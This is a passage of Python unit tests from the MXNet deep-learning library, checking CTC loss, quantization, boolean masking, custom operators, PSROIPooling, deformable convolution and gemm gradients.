with default_context():
data = mx.nd.array(inputs)
label = mx.nd.array(labels)
data.attach_grad()
with mx.autograd.record():
if contrib:
l = mx.contrib.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
else:
l = mx.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
l.backward()
assert_almost_equal(l, loss_truth, atol=1e-5, rtol=1e-5)
assert_almost_equal(data.grad, grad_truth, atol=1e-5, rtol=1e-5)
for contrib in [False, True]:
for label in ['first', 'last']:
check_ctc_loss_grad(label, contrib=contrib)
@with_seed()
def test_quantization_op():
min0 = mx.nd.array([0.0])
max0 = mx.nd.array([1.0])
a = mx.nd.array([[0.1392, 0.5928], [0.6027, 0.8579]])
qa, min1, max1 = mx.nd.contrib.quantize(a, min0, max0, out_type='int8')
a_ = mx.nd.contrib.dequantize(qa, min1, max1, out_type='float32')
qa_real = mx.nd.array([[18, 75], [77, 109]])
a_real = mx.nd.array([[0.14173228, 0.5905512], [0.6062992, 0.8582677]])
print(a_.asnumpy())
print(a_real.asnumpy())
assert same(qa.asnumpy(), qa_real.asnumpy())
assert_almost_equal(a_.asnumpy(), a_real.asnumpy(), rtol=1e-2)
@with_seed()
def test_index_copy():
x = mx.nd.zeros((5,3))
t = mx.nd.array([[1,2,3],[4,5,6],[7,8,9]])
index = mx.nd.array([0,4,2], dtype=np.int64)
tensor = mx.nd.array([[1,2,3],[0,0,0],[7,8,9],[0,0,0],[4,5,6]])
x_grad = mx.nd.array([[0,0,0],[1,1,1],[0,0,0],[1,1,1],[0,0,0]])
t_grad = mx.nd.array([[1,1,1],[1,1,1],[1,1,1]])
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
x.attach_grad()
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(x.grad.asnumpy(), x_grad.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
@with_seed()
def test_boolean_mask():
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 1, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.array([[4, 5, 6]])
expected_grad = np.array([[0, 0, 0], [1, 1, 1], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
# test 0-size output
mx.set_np_shape(True)
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 0, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.zeros((0, 3))
expected_grad = np.array([[0, 0, 0], [0, 0, 0], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
mx.set_np_shape(False)
# test gradient
shape = (100, 30)
a = mx.nd.random.randint(0, 100, shape=shape)
a.attach_grad()
bi = mx.nd.random.randint(0, 100, shape=shape[0:1]) > 50
ci = mx.nd.random.randint(0, 100, shape=shape[0:1]) < 50
mx_grad = mx.nd.zeros_like(a)
mx.autograd.mark_variables([a], [mx_grad], grad_reqs='add')
T = 3
for _ in range(T):
with mx.autograd.record():
b = mx.nd.contrib.boolean_mask(a, bi)
c = mx.nd.contrib.boolean_mask(a, ci)
su = b.sum() + c.sum()
su.backward()
grad = (bi + ci).asnumpy().reshape((-1,) + (1,) * (len(shape)-1))
grad = np.tile(grad, (1,) + shape[1:])
# T times
grad *= T
assert_allclose(a.grad.asnumpy(), grad)
a_np = a.asnumpy()
assert same(b.asnumpy(), a_np[bi.asnumpy().astype('bool')])
assert same(c.asnumpy(), a_np[ci.asnumpy().astype('bool')])
@with_seed()
def test_div_sqrt_dim():
data_tmp = np.random.normal(0, 1, (5, 10, 8))
data = mx.symbol.Variable('data')
test = mx.sym.contrib.div_sqrt_dim(data)
check_numeric_gradient(test, [data_tmp], numeric_eps=1E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp / np.sqrt(data_tmp.shape[-1])])
@with_seed()
def test_reciprocal_op():
eps = 2**(-11)
data_tmp = np.random.rand(3, 4) * 10 - 5
# Avoid possible division by 0 errors and finite difference method inaccuracies.
# Factor of 6 below set empirically, depends on eps.
# Issue exposed by seed 879579887.
# Replace problematic inputs with 1.0.
data_tmp[abs(data_tmp) < 6*eps] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.reciprocal(data)
check_numeric_gradient(test, [data_tmp], numeric_eps = eps)
check_symbolic_forward(test, [data_tmp], [np.reciprocal(data_tmp)])
@with_seed()
def test_cbrt_op():
eps = 2**(-11)
data_tmp = np.random.rand(3, 4) * 10 - 5
# Avoid finite difference method inaccuracies due to infinite gradient at the origin.
# Factor of 4 below set empirically, depends on eps.
# Issue exposed by seed 553872106.
# Replace problematic inputs with 1.0.
data_tmp[abs(data_tmp) < 4*eps] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.cbrt(data)
check_numeric_gradient(test, [data_tmp], numeric_eps=eps)
check_symbolic_forward(test, [data_tmp], [np.cbrt(data_tmp)])
@with_seed()
def test_rcbrt_op():
eps = 2**(-11)
data_tmp = np.random.rand(3, 4) * 10 - 5
# Avoid possible division by 0 errors and finite difference method inaccuracies.
# Factor of 4 below set empirically, depends on eps.
# Issue exposed by seed 788174893.
# Replace problematic inputs with 1.0.
data_tmp[abs(data_tmp) < 4*eps] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.rcbrt(data)
check_numeric_gradient(test, [data_tmp], numeric_eps = eps)
check_symbolic_forward(test, [data_tmp], [1/np.cbrt(data_tmp)])
@with_seed()
def test_custom_op():
class Sqr(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
if in_data[0].stype == 'default':
aux[0][:] = 1
self.assign(out_data[0], req[0], in_data[0]*in_data[0])
else:
inp = in_data[0]
csr_m = inp.data * inp.data
out = mx.nd.sparse.csr_matrix((csr_m, inp.indices, inp.indptr), shape=inp.shape)
self.assign(out_data[0], req[0], out)
if (in_data[0].stype == 'csr'):
assert(isinstance(out_data[0], mx.nd.sparse.CSRNDArray))
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], 2 * mx.nd.sparse.elemwise_mul(in_data[0], out_grad[0]))
if in_data[0].stype == 'default':
assert (aux[0].asnumpy() == 1).all()
@mx.operator.register("sqr")
class SqrProp(mx.operator.CustomOpProp):
def __init__(self):
super(SqrProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['data']
def list_outputs(self):
return ['output']
def list_auxiliary_states(self):
return ['aux']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], [in_shape[0]]
def infer_type(self, in_type):
return in_type, [in_type[0]], [in_type[0]]
def infer_storage_type(self, in_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default']
return ['csr'], ['csr'], ['csr']
def infer_storage_type_backward(self, ograd_stype, in_stype,
out_stype, igrad_stype, aux_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default'], ['default'], ['default']
return ['default'], ['csr'], ['csr'], ['csr'], ['csr']
def create_operator(self, ctx, shapes, dtypes):
return Sqr()
data = mx.symbol.Variable('data')
aux = mx.symbol.Variable('aux')
op = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.cast(data, dtype='float64')
op = mx.symbol.cast(op, dtype='float32')
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.Variable('data', stype='csr')
aux = mx.symbol.Variable('aux')
op2 = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = x.tostype('csr')
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op2, [x], [aux], grad_stype_dict={"data": "csr"})
x2 = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
x2 = x2.tostype('csr')
aux2 = mx.nd.zeros_like(x2)
x2.attach_grad()
with mx.autograd.record():
output = mx.nd.Custom(x2, aux2, name='sqr', op_type='sqr')
output.backward()
expected_output = mx.nd.sparse.square(x2)
expected_grad = 2 * x2
rtol = 1e-4
atol = 1e-6
assert_almost_equal(output, expected_output, rtol=rtol, atol=atol)
assert_almost_equal(x2.grad, expected_grad, rtol=rtol, atol=atol)
# test for backward compatibility, i.e. the correctness of default implementation of
# infer storage in custom operator
class Mult(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult")
class MultProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return Mult()
lhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
rhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
lhs.attach_grad()
rhs.attach_grad()
with mx.autograd.record():
y = mx.nd.Custom(lhs, rhs, name='mult', op_type='mult')
y.backward()
assert_almost_equal(rhs, lhs.grad, rtol=rtol, atol=atol)
assert_almost_equal(lhs, rhs.grad, rtol=rtol, atol=atol)
class MultNoGrad(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult_no_grad")
class MultNoGradProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultNoGradProp, self).__init__(need_top_grad=False)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return MultNoGrad()
def infer_storage_type_backward(self, ograd_stype, in_stype, out_stype, igrad_stype, aux_stype):
return ograd_stype, in_stype, out_stype, igrad_stype, aux_stype
with mx.autograd.record():
y2 = mx.nd.Custom(lhs, rhs, name="mult_no_grad", op_type="mult_no_grad")
y2.backward()
assert_almost_equal(rhs, lhs.grad, rtol=rtol, atol=atol)
assert_almost_equal(lhs, rhs.grad, rtol=rtol, atol=atol)
class NoInputOp(mx.operator.CustomOp):
def __init__(self, length, depth):
super(NoInputOp, self).__init__()
self.output = np.ones(shape=(length, depth), dtype=np.float32)
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], self.output)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register("no_input_op")
class NoInputOpProp(mx.operator.CustomOpProp):
def __init__(self, length, depth):
super(NoInputOpProp, self).__init__()
self.length = int(length)
self.depth = int(depth)
def list_arguments(self):
return []
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return [], [(self.length, self.depth)], []
def infer_type(self, in_type):
return [], [np.float32], []
def create_operator(self, ctx, shapes, dtypes):
return NoInputOp(length=self.length, depth=self.depth)
with mx.autograd.record():
x = mx.nd.Custom(length=10, depth=10, op_type="no_input_op")
assert_almost_equal(x, np.ones(shape=(10, 10), dtype=np.float32))
@unittest.skip("Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/17467")
@with_seed()
def test_custom_op_fork():
# test custom operator fork
# see https://github.com/apache/incubator-mxnet/issues/14396
class AdditionOP(mx.operator.CustomOp):
def __init__(self):
super(AdditionOP, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
out_data[0][:] = in_data[0] + in_data[1]
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
in_grad[0][:] = out_grad[0]
in_grad[1][:] = out_grad[0]
@mx.operator.register("AdditionOP")
class AdditionOPProp(mx.operator.CustomOpProp):
def __init__(self):
super(AdditionOPProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]]
def create_operator(self, ctx, shapes, dtypes):
return AdditionOP()
if not sys.platform.startswith('win'): # no fork in windows
def custom_add():
a = mx.nd.array([1, 2, 3])
b = mx.nd.array([4, 5, 6])
c = mx.nd.Custom(a, b, op_type='AdditionOP')
assert_almost_equal((a + b).asnumpy(), c.asnumpy())
custom_add()
from multiprocessing import Process
p = Process(target=custom_add)
p.daemon = True
p.start()
p.join(5)
assert not p.is_alive() and p.exitcode == 0
def _build_dot_custom(fun_forward, name):
class Dot(mx.operator.CustomOp):
def __init__(self):
super(Dot, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
fun_forward(in_data, out_data)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register(name)
class DotProp(mx.operator.CustomOpProp):
def __init__(self):
super(DotProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [(in_shape[0][0], in_shape[1][1])]
def create_operator(self, ctx, shapes, dtypes):
return Dot()
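# _build_dot_custom registers a minimal custom operator under `name` whose forward
# delegates to `fun_forward` and whose backward is a no-op; the exception-handling
# tests below use it to inject failures at different stages of execution.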
@with_seed()
def test_custom_op_exc():
# test except handling
# see https://github.com/apache/incubator-mxnet/pull/14693
# 1. error in python code
def custom_exc1():
def f(in_data, out_data):
assert False
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot1')
a = mx.nd.zeros((4, 1))
b = mx.nd.zeros((1, 4))
c = mx.nd.Custom(a, b, op_type='Dot1')
c.wait_to_read()
assert_raises(MXNetError, custom_exc1)
# 2. error in pushing operator to engine
def custom_exc2():
def f(in_data, out_data):
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot2')
a = mx.nd.zeros((4, 2))
b = mx.nd.zeros((1, 4))
# trigger error by invalid input shapes of operands
c = mx.nd.Custom(a, b, op_type='Dot2')
c.wait_to_read()
assert_raises(MXNetError, custom_exc2)
# 3. error in real execution
if default_context().device_type == 'cpu':
def custom_exc3():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# the input to Cholesky factorization should be
# symmetric positive-definite; an error will be
# triggered during op execution on CPU
out_data[0][:] = mx.nd.linalg.potrf(dot)
out_data[0].wait_to_read()
_build_dot_custom(f, 'Dot3')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot3')
c.wait_to_read()
assert_raises(MXNetError, custom_exc3)
def custom_exc4():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# the input to Cholesky factorization should be
# symmetric positive-definite; an error will be
# triggered during op execution on CPU
out_data[0][:] = mx.nd.linalg.potrf(dot)
_build_dot_custom(f, 'Dot4')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot4')
c.wait_to_read()
assert_raises(MXNetError, custom_exc4)
@with_seed()
def test_psroipooling():
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([168, 224], [168, 224]):
for grad_nodes in [['im_data']]:
spatial_scale = 0.0625
feat_height = int(image_height * spatial_scale)
feat_width = int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1))
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1))
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
op = mx.sym.contrib.PSROIPooling(data=im_data_var, rois=rois_data_var, spatial_scale=spatial_scale,
group_size=num_group, pooled_size=num_group,
output_dim=num_classes, name='test_op')
rtol, atol = 1e-2, 1e-3
check_numeric_gradient(op, [im_data, rois_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes)
@with_seed()
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# plain psroipooling
sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
@with_seed()
def test_deformable_convolution():
for num_batch in [1, 2]:
for num_channel_data, num_deformable_group in itertools.product([4, 8], [1, 2]):
for input_height, input_width in itertools.product([5, 6], [5, 6]):
for dilate in [(1, 1), (2, 2)]:
for grad_nodes in [['im_data'], ['offset_data'], ['weight']]:
output_height = input_height
output_width = input_width
im_data = np.random.rand(num_batch, num_channel_data, input_height, input_width)
offset_data = \
np.random.rand(num_batch, num_deformable_group * 3 * 3 * 2, output_height, output_width)\
* 0.8 + 0.1
weight = np.random.normal(0, 0.001, (num_channel_data, num_channel_data, 3, 3))
bias = np.zeros(num_channel_data)
im_data_var = mx.symbol.Variable(name="im_data")
offset_data_var = mx.symbol.Variable(name="offset_data")
weight_var = mx.symbol.Variable(name="weight")
bias_var = mx.symbol.Variable(name="bias")
op = mx.sym.contrib.DeformableConvolution(name='test_op', data=im_data_var,
offset=offset_data_var,
weight=weight_var, bias=bias_var,
num_filter=num_channel_data, pad=dilate,
kernel=(3, 3), stride=(1, 1), dilate=dilate,
num_deformable_group=num_deformable_group)
if grad_nodes[0] == 'offset_data':
# wider tolerance needed for coordinate differential
rtol, atol = 1.0, 1e-2
else:
rtol, atol = 0.05, 1e-3
# For now we only have a GPU implementation
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, offset_data, weight, bias], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0))
def _validate_sample_location(input_rois, input_offset, spatial_scale, pooled_w, pooled_h, sample_per_part, part_size, output_dim, num_classes, trans_std, feat_h, feat_w):
num_rois = input_rois.shape[0]
output_offset = input_offset.copy()
# simulate the deformable psroipooling forward pass
for roi_idx in range(num_rois):
sub_rois = input_rois[roi_idx, :].astype(np.float32)
img_idx, x0, y0, x1, y1 = int(sub_rois[0]), sub_rois[1], sub_rois[2], sub_rois[3], sub_rois[4]
roi_start_w = round(x0) * spatial_scale - 0.5
roi_start_h = round(y0) * spatial_scale - 0.5
roi_end_w = round(x1 + 1) * spatial_scale - 0.5
roi_end_h = round(y1 + 1) * spatial_scale - 0.5
roi_w, roi_h = roi_end_w - roi_start_w, roi_end_h - roi_start_h
bin_size_w, bin_size_h = roi_w / pooled_w, roi_h / pooled_h
sub_bin_size_w, sub_bin_size_h = bin_size_w / sample_per_part, bin_size_h / sample_per_part
for c_top in range(output_dim):
channel_each_cls = output_dim / num_classes
class_id = int(c_top / channel_each_cls)
for ph in range(pooled_h):
for pw in range(pooled_w):
part_h = int(math.floor(float(ph) / pooled_h * part_size))
part_w = int(math.floor(float(pw) / pooled_w * part_size))
trans_x = input_offset[roi_idx, class_id * 2, part_h, part_w] * trans_std
trans_y = input_offset[roi_idx, class_id * 2 + 1, part_h, part_w] * trans_std
bin_h_start, bin_w_start = ph * bin_size_h + roi_start_h, pw * bin_size_w + roi_start_w
need_check = True
while need_check:
pass_check = True
for ih in range(sample_per_part):
for iw in range(sample_per_part):
h = bin_h_start + trans_y * roi_h + ih * sub_bin_size_h
w = bin_w_start + trans_x * roi_w + iw * sub_bin_size_w
if w < -0.5 or w > feat_w - 0.5 or h < -0.5 or h > feat_h - 0.5:
continue
w = min(max(w, 0.1), feat_w - 1.1)
h = min(max(h, 0.1), feat_h - 1.1)
# if the following condition holds, the sampling location is not differentiable,
# so we need to re-do the sampling process
if h - math.floor(h) < 1e-3 or math.ceil(h) - h < 1e-3 or w - math.floor(w) < 1e-3 or math.ceil(w) - w < 1e-3:
trans_x, trans_y = random.random() * trans_std, random.random() * trans_std
pass_check = False
break
if not pass_check:
break
if pass_check:
output_offset[roi_idx, class_id * 2 + 1, part_h, part_w] = trans_y / trans_std
output_offset[roi_idx, class_id * 2, part_h, part_w] = trans_x / trans_std
need_check = False
return output_offset
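# Illustrative-only note (not part of the original tests): the helper above
# perturbs the raw offsets so that no bilinear sampling location falls (almost)
# exactly on an integer grid line, where the interpolation is not differentiable;
# the adjusted offsets are then fed to DeformablePSROIPooling in
# test_deformable_psroipooling below before the numeric gradient check.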
@unittest.skip("Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/11713")
@with_seed()
def test_deformable_psroipooling():
sample_per_part = 4
trans_std = 0.1
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([160, 224], [160, 224]):
for grad_nodes in [['im_data'], ['offset_data']]:
spatial_scale = 0.0625
stride = int(1 / spatial_scale)
feat_height = int(image_height * spatial_scale)
feat_width = int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1 - 2 * stride)) + stride
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1 - 2 * stride)) + stride
offset_data = np.random.rand(num_rois, 2*num_classes, num_group, num_group)
# at certain points, the bilinear interpolation function may be non-differentiable
# to avoid this, we check that the sampling locations fall on valid (differentiable) points
offset_data = _validate_sample_location(rois_data, offset_data, spatial_scale, num_group, num_group,
sample_per_part, num_group, num_classes, num_classes, trans_std, feat_height, feat_width)
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
offset_data_var = mx.symbol.Variable(name="offset_data")
op = mx.sym.contrib.DeformablePSROIPooling(data=im_data_var, rois=rois_data_var,
trans=offset_data_var, spatial_scale=spatial_scale,
sample_per_part=4, group_size=num_group,
pooled_size=num_group, output_dim=num_classes,
trans_std=0.1, no_trans=False, name='test_op')
rtol, atol = 1e-2, 1e-3
# For now we only have a GPU implementation
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, rois_data, offset_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0))
def _gemm_test_helper(dtype, grad_check, rtol_fw = 1e-7, atol_fw = 1e-9):
num_eps = 1e-6
rtol_bw = 1e-5
atol_bw = 1e-6
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
data3 = mx.symbol.Variable('data3')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
shape1 = (2, 3)
shape2 = (3, 2)
shape3 = (3, 3)
shape4 = (2, 2)
data_in1 = np.random.uniform(1, 10, shape1).astype(dtype)
data_in2 = np.random.uniform(1, 10, shape2).astype(dtype)
data_in3 = np.random.uniform(1, 10, shape3).astype(dtype)
data_in4 = np.random.uniform(1, 10, shape4).astype(dtype)
# Check all transpositions of gemm operator.
data_in1_t = np.transpose(data_in1)
data_in2_t = np.transpose(data_in2)
res_gemm = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [data_in1, data_in2, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in4])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True, transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in3])
res_gemm = 4. * np.dot(data_in1_t, data_in1) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in3])
res_gemm = 4. * np.dot(data_in1, data_in1_t) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in4])
# Check batch of gemm.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
c = rep_3x(data_in4, 2, 2)
r = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
r = rep_3x(r, 2, 2)
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [a, b, c], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b, c])
# Check for different axis that describes matrix rows.
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
c2 = np.copy(np.swapaxes(c, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = 0)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
c2 = np.copy(np.swapaxes(c, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = -3)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
# Check the gemm2 operator the same way as gemm.
res_gemm = 4. * np.dot(data_in1, data_in2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in1)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
res_gemm = 4. * np.dot(data_in1, data_in1_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
# Check batch of gemm2.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
r = rep_3x(4. * np.dot(data_in1, data_in2), 2, 2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [a, b], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b])
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = 0)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = -3)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
# Test gemm separately from other la-operators.
@with_seed()
def test_gemm():
_gemm_test_helper(np.float64, True)
os.environ["MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"] = "0"
_gemm_test_helper(np.float32, False, rtol_fw = 1e-5, atol_fw = 1e-7)
if default_context().device_type == 'gpu':
os.environ["MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"] = "1"
_gemm_test_helper(np.float32, False, rtol_fw = 2e-5, atol_fw = 2e-7)
